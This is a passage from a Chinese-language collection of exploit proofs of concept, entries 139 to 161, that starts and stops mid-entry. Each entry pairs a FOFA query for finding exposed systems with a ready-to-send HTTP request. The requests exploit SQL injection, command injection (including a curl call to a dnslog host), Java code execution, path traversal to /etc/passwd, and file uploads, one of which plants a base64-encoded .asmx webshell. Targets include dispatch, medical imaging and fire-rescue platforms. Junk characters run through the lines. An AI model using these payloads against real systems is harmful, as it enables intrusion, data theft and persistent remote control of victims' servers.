Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! N0 m7 D. q$ k" x# z+ }Accept-Encoding: gzip, deflate, br
( u1 ]2 w* t5 C4 d$ nConnection: close. |; R9 s8 r2 ]) l2 x8 J( D
Upgrade-Insecure-Requests: 1/ G! F6 d% O" U% ]8 ]9 d
4 a) j! y# U; s# w. [' E! l8 i' |
6 n9 q2 O1 C3 ~2 ?5 Y, q139. 福建科立讯通信指挥调度平台editemedia.php sql注入
$ a$ c: c5 R) n; n% x+ a& N! HCVE-2024-2622
$ T8 n, K+ o+ yFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
# P2 r6 d# B( ^- M9 v5 P7 C' D9 fGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
1 S' U4 q8 v3 ]; R+ \9 _! hHost: x.x.x.x) K/ S# ?" m7 T+ n) L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
3 p) g2 g# d# E/ ~& M* m% WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( O3 Z; M1 D; y4 r. ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. h; p4 i" S, T: q' p
Accept-Encoding: gzip, deflate, br
" z' s$ s/ Y4 p, V( R2 [Connection: close
/ N6 d5 p/ b8 ?; w1 X7 dCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
. H# B% u- A( m |% n! q* l3 @Upgrade-Insecure-Requests: 1& G: ~( p2 U! L0 l+ P
$ R* y# q: J% K7 M
# @' k% g" E. n% e( b+ |
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
; t7 d" o% B/ A$ C: U$ _1 t4 q5 k9 @CVE-2024-2566) J2 b2 i2 ^! q9 T
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"- o0 Z# X1 [4 Q' q5 ]
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
$ ~1 u" { n: u% mHost: x.x.x.x6 Z6 I8 x R0 B2 k, A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ V, g9 a9 m9 ?: A; X7 U' yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 u% u" _4 U s; g9 \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 u. F. c. Y4 F# T( L
Accept-Encoding: gzip, deflate, br3 Q: _. s0 c4 Z9 }; k. s Q6 s8 e
Connection: close
6 b# g+ b6 S/ F. U. _' @7 j6 G& }& G9 ZCookie: authcode=h8g9: G0 Z c# O' p: Z. z
Upgrade-Insecure-Requests: 1
z+ s1 A- ^* W% O2 F: p" Y. ?: p4 V# f E
7 H0 X" ^% H0 `* {# P- {141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
1 A p# f0 I; k9 ^1 bFOFA:body="指挥调度管理平台"; s; i6 V Z- K3 ^9 w+ b; H3 I
POST /app/ext/ajax_users.php HTTP/1.19 A5 H/ M7 T8 D
Host: your-ip
% _* L; D/ R* I: v7 n% f/ ~User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info4 q: R/ e- P; q7 T/ ]- c
Content-Type: application/x-www-form-urlencoded7 y6 E7 Q) W* ^8 A6 E5 e5 E* w7 ]
0 p0 W0 ^+ I$ J! Q* g8 N
/ n3 J! n" {2 o5 e) J; s
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
$ W2 x9 e$ G4 m+ e; L5 d4 q7 \
' T7 Y' j* Q/ F3 u: M" i+ a/ ~* M4 C+ l( Q
142. CMSV6车辆监控平台系统中存在弱密码# {$ h" P6 ?- ~% ^0 s
CVE-2024-29666
% Z- B9 _# r* K0 cFOFA:body="/808gps/"0 ]2 {7 F( d# x2 Z
admin/admin
" @8 ~3 w- R' }4 A, `' f u5 ~" H143. Netis WF2780 v2.1.40144 远程命令执行2 ?( x; Q7 L; H# _
CVE-2024-25850
8 l2 g5 o- \# g1 R6 o# R) ?5 b: YFOFA:title='AP setup' && header='netis' U% s+ T* Y% ?$ m( H# L
PAYLOAD
8 M4 ?" Q- b" d
4 Z- O# E! x* ]5 E( p4 G144. D-Link nas_sharing.cgi 命令注入8 T; |. M, d0 V- |
FOFA:app="D_Link-DNS-ShareCenter"
! `6 k# ?( P( J* Lsystem参数用于传要执行的命令7 x( V S' W+ q1 ~
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
. _; N- o% Z- ^- @% s: ]Host: x.x.x.x s/ ^0 Z5 @, j5 d# b% N
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.06 H) K9 l. Q/ k( H4 j- n
Connection: close, x4 i) i8 [ w3 J0 N! c! @% O, Y
Accept: */*
* `. _7 c: ~( ]/ Q( n# ]Accept-Language: en5 Z8 \7 O# E. T- q. T" P$ m
Accept-Encoding: gzip
% o# g- |: x, s5 V% e6 ?0 d6 ]7 ^4 K3 _3 K- N* I& h5 S2 L0 u
0 p/ w) F0 n# d# s145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
4 i! M& m! W7 ~0 ?CVE-2024-3400
9 {+ B6 Z1 k' Q) XFOFA:icon_hash="-631559155"
0 w2 u/ y# F+ G, K- @4 w5 m3 \GET /global-protect/login.esp HTTP/1.1. u$ `$ q4 W1 d$ c! f- U4 [2 c$ J
Host: 192.168.30.112:1005) h- z) K. @% H' Q- n/ ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.843 F/ I' \: ^! N4 p/ S
Connection: close
3 D; @( m2 j, X( m; C& `# y4 `; ~Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;; B2 Z$ ]. O2 J1 L$ X
Accept-Encoding: gzip
# A; R2 j% N: F; _8 \( I' G5 `3 H% D3 f) A' F
' I4 j7 t* R. ?! E& a% ^6 |; T; c
146. MajorDoMo thumb.php 未授权远程代码执行
6 e+ Y4 B6 C; o- Z1 g3 f' TCNVD-2024-02175" m0 y# t/ `+ I+ X% Y
FOFA:app="MajordomoSL"
( D5 R, \. G. M9 w% ?: c- eGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.11 C5 K6 _0 n7 V! z5 @3 u
Host: x.x.x.x8 F0 v% l Y' \/ a3 R' G; N6 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84, F0 Z' B+ e0 @3 W% P
Accept-Charset: utf-8# T F- v& O& ?- k
Accept-Encoding: gzip, deflate
* d' i: V9 z3 W# b5 m7 c5 M, o. HConnection: close) s+ {5 ?/ R7 `, V0 x
& X+ w; W0 N+ ` C1 I
# K* R: o( S& g- W2 j! R6 b0 {% |1 c
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
, k. a/ L8 f2 V8 r4 VCVE-2024-32399
- ^. T4 [. D, \# ?) c/ fFOFA:body="RaidenMAILD"
8 @+ C9 x4 C0 i! ~$ TGET /webeditor/../../../windows/win.ini HTTP/1.1
% _- |# u+ H! QHost: 127.0.0.1:81: e) C) C }7 N; D% ~! J2 B# w
Cache-Control: max-age=0' O/ U F* L, |/ T- U
Connection: close1 ?, x- r& c* `9 K" `
. l1 }4 k0 D; i
& C4 X! j. Q# i148. CrushFTP 认证绕过模板注入7 v3 `+ `8 z" _% `/ g
CVE-2024-4040# J+ w. ]5 \) ]2 ^ s& K
FOFA:body="CrushFTP"1 }; u ^/ a4 t6 R- q
PAYLOAD4 O. ?7 u0 v7 g7 n& x2 b' F
- g1 R% @" x- U( g C; K149. AJ-Report开源数据大屏存在远程命令执行
% {, [( c- h, \& w% b, bFOFA:title="AJ-Report"1 f x) z1 Y% G" Q/ t0 V
6 X J: E( q3 U( T( [
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
t7 |+ \' a/ d8 E- {0 K6 o$ mHost: x.x.x.x3 t, K; V) l* e9 V. W4 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36' W6 O; C, O+ ] c X5 v! v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! o, p# l" X. P% y* [6 hAccept-Encoding: gzip, deflate, br
% R- T1 t3 ^* q" pAccept-Language: zh-CN,zh;q=0.9
5 i/ ^/ u& j6 j* zContent-Type: application/json;charset=UTF-80 Z) i. I% _1 a4 {* Z8 M" a! Q+ ~
Connection: close5 l; k5 X- j8 l* D }0 O
! A& A, c3 w" _* U/ z2 \9 m
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
. C$ N! N& K5 z6 A9 |& j5 z" z! r1 o' A' Y$ n
150. AJ-Report 1.4.0 认证绕过与远程代码执行$ J/ K: c' D' H5 K6 e# O
FOFA:title="AJ-Report"
# p4 w$ n& w3 g% C) C4 lPOST /dataSetParam/verification;swagger-ui/ HTTP/1.10 D2 o) z7 ~$ E5 a. K" H5 L+ a
Host: x.x.x.x
3 A& H+ ^4 C* D. eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 u5 D% J! b2 L$ ^" q0 @9 A/ {7 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* b& b0 ^9 t( {% |
Accept-Encoding: gzip, deflate, br$ w; S/ g$ K, P" n; F6 u
Accept-Language: zh-CN,zh;q=0.9
$ Q3 @0 ?3 T! PContent-Type: application/json;charset=UTF-8' Q7 p: e1 {5 X+ z' X/ u/ E
Connection: close, V% x; H2 y" j% o
Content-Length: 3391 I7 a: T/ S* _
( M8 o* U B$ ^. T) r{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}3 o6 m# d+ ?- F1 X" U; l6 Z3 p
$ c5 s* U( z3 _6 J) N
! N( v+ s5 c4 Q2 C9 e7 h
151. AJ-Report 1.4.1 pageList sql注入+ T% \% I' B: A1 R# [
FOFA:title="AJ-Report"1 k% ]+ m2 W/ b$ V) ^% I9 \
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1& h+ d# J0 p' e/ Z$ O: R8 D( v1 j
Host: x.x.x.x
: k; }0 ^& g3 A. i, }4 r. iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' O# [5 l6 u F3 F8 y) Z7 R) XConnection: close6 h3 W0 [% n. x8 V* p
Accept-Encoding: gzip
7 G. C* F% C: r# Q6 r0 a( S) P5 ], [8 J
) v2 H1 r3 N. J% n
152. Progress Kemp LoadMaster 远程命令执行9 q7 q; G, _6 c
CVE-2024-12125 d9 f; v) M% m6 o* r
LoadMaster <= 7.2.59.2 (GA)
7 a( q9 k+ S+ ]5 E& V3 L: E- l, U0 rLoadMaster<=7.2.54.8 (LTSF)9 S: t/ U" s- P- _
LoadMaster <= 7.2.48.10 (LTS)
4 ]8 |: w+ ] j4 R6 e0 |FOFA:body="LoadMaster"5 t$ U/ O; v; u1 ~ Z) t, `( N1 ~
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
% X) H+ M( i8 ~GET /access/set?param=enableapi&value=1 HTTP/1.1" W; X6 t: Q4 x1 M9 l
Host: x.x.x.x' S F3 w' b5 S+ ?' U! B! ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
) h9 W/ E- b$ bConnection: close9 S8 l! h+ Q, Y. z/ h
Accept: */*4 e6 W v9 e- X7 L: e8 r! ]
Accept-Language: en7 _2 x) l6 i8 [: \0 M( x) |! a
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
1 w+ s) }- T- f( _: P( DAccept-Encoding: gzip2 N, X1 a: w% S/ |, l3 g% a% p0 O
- Z- v- U& L; R( O( X/ M
3 _2 F; n+ Z6 y* r( R V153. gradio任意文件读取9 E4 b# j. E# O5 _# y
CVE-2024-1561FOFA:body="__gradio_mode__"7 |2 n! o/ g/ l6 X% [
第一步,请求/config文件获取componets的id, s6 }8 \2 @' u5 b$ V2 d e
http://x.x.x.x/config
) E$ W% R+ S4 a7 V1 d" B4 F. }/ ~3 p x: _3 u
+ m6 O. I" U: v第二步,将/etc/passwd的内容写入到一个临时文件$ r, k& T) j' ~: m; a) _! i
POST /component_server HTTP/1.1
% L$ B8 A1 U; G1 lHost: x.x.x.x
% a; k# |( a4 ]) ?- H9 d) WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3' \( O$ O# a, K1 ^' `$ T" f/ H6 a0 L
Connection: close
: c% q9 f) p9 ^. S# B1 RContent-Length: 115
( V7 z O9 a3 ]4 EContent-Type: application/json: I! r$ U/ {" g* `+ d ~5 Q, L
Accept-Encoding: gzip
4 y$ W4 ~( w# l- ~3 z/ I$ o5 I4 ?& K4 M6 E& _$ b
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
( Q! |! }7 p! L1 z. O8 L
+ z3 Z, e/ _; ^( } r) h4 c. M* y4 g
第三步访问9 L& P% D% A* m" }
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd2 F) b0 E& U$ K F L% x
l4 G3 B4 o: J X
. D' T4 E1 N% V5 q" l154. 天维尔消防救援作战调度平台 SQL注入
+ Q$ F2 T+ {$ A$ }( @% [CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
* o9 g8 u- H3 T+ [+ w, X1 Y$ uPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
w3 M8 t! \1 H+ W9 BHost: x.x.x.x' H X8 K$ F6 {
Content-Length: 106% C1 B; ?2 Z8 ^/ j8 F1 U9 \7 Q
Cache-Control: max-age=0" h+ B" c! Y( A; ^5 {) B
Upgrade-Insecure-Requests: 10 o' i7 w: a( O, P8 Z
Origin: http://x.x.x.x' j) l' M ]" d: O% }7 c; |& E
Content-Type: application/json
, t1 c# _# s# {( G# P, TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36+ E% h k' |9 x0 M& }8 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 s2 `6 C) y' W- T+ A7 v
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
6 r: I3 b) p9 d9 RAccept-Encoding: gzip, deflate% m- K: O. G7 F
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
7 z0 A5 `7 R" p% C' K. dConnection: close
8 ^3 f. L% P* e3 E$ _% h. f& e3 y* f- O6 w. M4 B9 f
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}+ N7 Q: Y G: E, W: e- Y r
2 Z; c" t, I9 q3 {/ U
# s+ _7 Q' z- M9 b' q
155. 六零导航页 file.php 任意文件上传/ [, v6 {/ ]) p4 ]9 _* w
CVE-2024-34982
' Q6 `# O+ B" H/ H" |FOFA:title=="上网导航 - LyLme Spage"
7 l' t* O( v: z# x! x. y8 G ]+ JPOST /include/file.php HTTP/1.1" i( G0 n6 W' T2 Q
Host: x.x.x.x0 q+ M2 U& n4 Q. J; N: V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.09 j1 O5 k0 d' V4 ?
Connection: close* ~# X% A8 q* I5 s8 P5 j& {) S$ @
Content-Length: 232
2 ~: u3 }% Z, J2 ?' H1 v9 C2 BAccept: application/json, text/javascript, */*; q=0.01
; j2 |; k4 y1 t( j" V9 AAccept-Encoding: gzip, deflate, br6 h1 _) a# p2 P' a+ `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 ?8 o# W7 k( x4 X( Q
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
" h! ~' m0 N- F* E( vX-Requested-With: XMLHttpRequest: K. ?5 J- J9 m! S
2 O7 r% X" w9 S' a, ?
-----------------------------qttl7vemrsold314zg0f6 y( ^9 p+ b/ T! N& l7 q
Content-Disposition: form-data; name="file"; filename="test.php"
5 W' T' C& F+ b _; E; h; t- m1 m6 @Content-Type: image/png' ^% A% ]2 g; O; h9 D$ [0 d+ R
+ ]% t3 Y/ E; A1 c9 R<?php phpinfo();unlink(__FILE__);?>
* `$ k1 i; f: M0 J3 G, p/ n-----------------------------qttl7vemrsold314zg0f--0 B/ `, d# E5 w: i- R4 G+ @& I
6 {) ]2 r3 ^) u1 P/ O; w, ?! h
3 D0 E r# G5 U8 d- j: z5 ^+ _$ [访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php8 U1 w8 [! p: I! {
4 i0 S0 F( x$ p4 }: ?156. TBK DVR-4104/DVR-4216 操作系统命令注入2 i2 D! W- z* s3 _+ U
CVE-2024-3721" u3 j% r) U6 g
FOFA:"Location: /login.rsp"$ E, T W% N9 h
·TBK DVR-4104' K; R) ]1 H9 I1 C' O. k8 b4 A
·TBK DVR-4216
3 Z1 f/ k% b) a6 Ccurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"5 p7 G* b- d- |* Z( F' v
: n7 [2 ~( n8 ^ z% T
6 r! E: J2 g; J0 {7 ^5 f6 N
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
1 q+ o4 P! ~# _3 tHost: x.x.x.x2 T2 F1 D9 Q9 _2 s* M8 I
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 |9 e" l8 x. d/ qConnection: close8 s# M" ` ^8 D/ p- l
Content-Length: 08 R8 M1 Y# {+ G: T. q. f5 a, m
Cookie: uid=1
6 n8 h, Z: J6 rAccept-Encoding: gzip
) Q3 W. E& Q" u- E' l8 Y7 N
) P2 _9 @+ A+ R! U) _( K# d1 ^8 T" f
157. 美特CRM upload.jsp 任意文件上传: J0 p1 p' Z! g( N1 B! p
CNVD-2023-06971* U. N' c& x8 ]- P4 t" L; T! [! c
FOFA:body="/common/scripts/basic.js"
6 g7 l( F/ R0 w8 O& V' N& j6 WPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1% v3 |) ~) Q; ?8 {% r
Host: x.x.x.x
/ j; I4 n% N" _/ C, \* JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
' m2 F% |% h" AContent-Length: 709
1 r u0 U& j) eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 X. F8 [, O3 l+ H+ o) RAccept-Encoding: gzip, deflate
& {: i8 |; w1 A, ]* X6 G9 bAccept-Language: zh-CN,zh;q=0.9
1 D% E6 l8 Z: L- o$ uCache-Control: max-age=0
/ j' l) p6 `( p/ G2 gConnection: close2 J9 T. e' j% w
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN4 |/ F& H5 s5 ? }0 i
Upgrade-Insecure-Requests: 1
' G3 |0 N; S2 Y
" V4 N! ^$ q/ R9 _2 V! w# B% |------WebKitFormBoundary1imovELzPsfzp5dN
6 e8 b& S9 m1 M6 l( M0 `* C( q9 @) I% RContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
0 @6 Z+ C6 x* @7 F" q( n5 o" E9 E# wContent-Type: application/octet-stream# [* O) d" b7 M
8 b% Q8 }" a3 w2 p7 n# dnyhelxrutzwhrsvsrafb2 A' q0 w; \( a
------WebKitFormBoundary1imovELzPsfzp5dN* S" V+ ^# V7 Z8 |: S q4 B
Content-Disposition: form-data; name="key"7 Q* P9 o# q# h7 k2 E# g1 F
5 ?5 q W3 p: `* d0 ^4 J
null8 U9 s! S+ R8 r* `
------WebKitFormBoundary1imovELzPsfzp5dN" c0 B" r- t: ?$ }$ `
Content-Disposition: form-data; name="form"
2 S- N: Q; C" G- Q W; p5 e
2 I4 Q ]& ^$ l4 qnull$ B0 d! l* E, W9 T
------WebKitFormBoundary1imovELzPsfzp5dN' [1 T1 x2 j2 Q0 k( {; e- g
Content-Disposition: form-data; name="field"7 n6 B1 q+ p9 F) I
+ A( y& j. a8 h3 b7 \4 r8 V
null
& @0 v3 p5 v# j3 C- F: B------WebKitFormBoundary1imovELzPsfzp5dN; J3 Z$ i0 M: ^5 \8 R7 ^
Content-Disposition: form-data; name="filetitile"3 ? y& I4 J6 ?. E( g+ u: j1 `
% m; \; f) F4 T1 c
null
/ @: o/ g$ e3 {- _ ~3 y( M! }' a------WebKitFormBoundary1imovELzPsfzp5dN* x; X: w6 M0 t* p$ i, N
Content-Disposition: form-data; name="filefolder"
) k, P: C- R2 a2 |4 I/ t
- d- W: M3 m% t0 knull
, d/ w5 z; {# K& ^5 T( C, g------WebKitFormBoundary1imovELzPsfzp5dN--
) b6 O/ N, `4 q" W
# Y, ?, }8 @0 F) y( r& L
# |# u) {* W( y( P( ohttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp6 [3 x9 q" [9 n+ A
6 \& V& b, R1 E5 w% d v3 F/ F158. Mura-CMS-processAsyncObject存在SQL注入
% a! G4 w3 ~: A+ m% Q7 E9 kCVE-2024-32640
7 {4 a& M* @2 H; y0 oFOFA:"Generator: Masa CMS". h7 ^/ n: s7 [3 z, W1 P! n
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1 A9 W7 i0 Y4 k" S& U4 N7 E
Host: {{Hostname}}
. E4 F5 `# Y5 x6 k' m* cContent-Type: application/x-www-form-urlencoded& |7 H( ^9 y* } O" r; e) b- x* W) t
% E5 r4 p4 ^1 a) i
object=displayregion&contenthistid=x\'&previewid=1% R0 Q9 R8 r- R
4 E7 m2 A& n3 q Y0 s
. Z& t" {: P- ?% o) |159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传' g! H# G5 ]& L, D. L8 I4 {
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
4 z% E! c6 p: ]+ ]" nPOST /webservices/WebJobUpload.asmx HTTP/1.1& Z+ Q9 f" N) w! [4 E% k' X
Host: x.x.x.x1 A* }. a0 m7 y1 Z" X/ ?8 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" k/ `* i$ x" n, j8 K
Content-Length: 10808 m' y; g! }0 L8 W" s" ?
Accept-Encoding: gzip, deflate
# U5 [1 t$ w) F5 {5 t* gConnection: close
6 p ?5 v2 K5 | `1 N* MContent-Type: text/xml; charset=utf-8
& h5 s9 X9 G! ] LSoapaction: "http://rainier/jobUpload"
: G: f2 j* \1 o/ Z. L
; s# P- a, j* {<?xml version="1.0" encoding="utf-8"?>2 w6 `; u) O/ Z) X3 L
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">6 @; A. n. Q3 `( @' U- i+ N5 }
<soap:Body>7 |& C, o* L- Q; S
<jobUpload xmlns="http://rainier">! D7 c6 {) r. Z/ ]4 O* j
<vcode>1</vcode>: E+ ^# o* A2 ^* P- T# U4 }
<subFolder></subFolder>- b/ F& m/ n3 J
<fileName>abcrce.asmx</fileName>, E3 n1 s8 y; L0 o8 i) r9 H
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
5 X1 W! R( j& s4 J3 `; j</jobUpload>" A2 r, l) W- Q0 v8 x2 h5 f7 T
</soap:Body>
% \" N7 l2 w3 U</soap:Envelope>
$ |9 h: a& Z4 H# U+ x# `
* e# Q' z4 H1 i) U
8 i; E0 {. P2 Q, e/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")! }& ~) M9 g4 a7 }
1 [1 Z5 m1 q! @7 D
- B& o4 e4 t% g; M3 W% i" I. m160. Sonatype Nexus Repository 3目录遍历与文件读取
! g% K$ j, s6 x2 [2 yCVE-2024-49562 j- }2 P% Q1 V x8 _' O
FOFA:title="Nexus Repository Manager"; H9 M5 `& G: `5 w. \& w2 B6 }
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1. N$ b" V' q. V: Q6 W2 J" W/ p
Host: x.x.x.x
( J3 a0 E- t9 Y8 ^+ P; t$ OUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
7 r* ?/ w1 ^5 s! G+ G4 a! W. J3 UConnection: close. |% |$ E, N8 i2 q/ \+ k; V
Accept: */*4 L# O. t$ l0 f! x7 |
Accept-Language: en$ B6 f: d5 D- A6 F5 T9 c
Accept-Encoding: gzip F. ~1 y& t* ~* {
- \: G0 V9 r9 i/ }
- y7 g( o! j( N' o! `4 _: H1 R( ?
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传) N* w8 X' M8 C, Y3 J
FOFA:body="/KT_Css/qd_defaul.css", y1 M1 W% O* N) ?, L
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
3 U7 A5 x, M, N- [1 y1 pPOST /Webservice.asmx HTTP/1.16 t' @2 r; x+ k- I; Q% q% o; i
Host: x.x.x.x( V2 f6 l; v8 t& G9 q, J5 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
, w2 ?2 A3 \# X8 x0 h3 vConnection: close
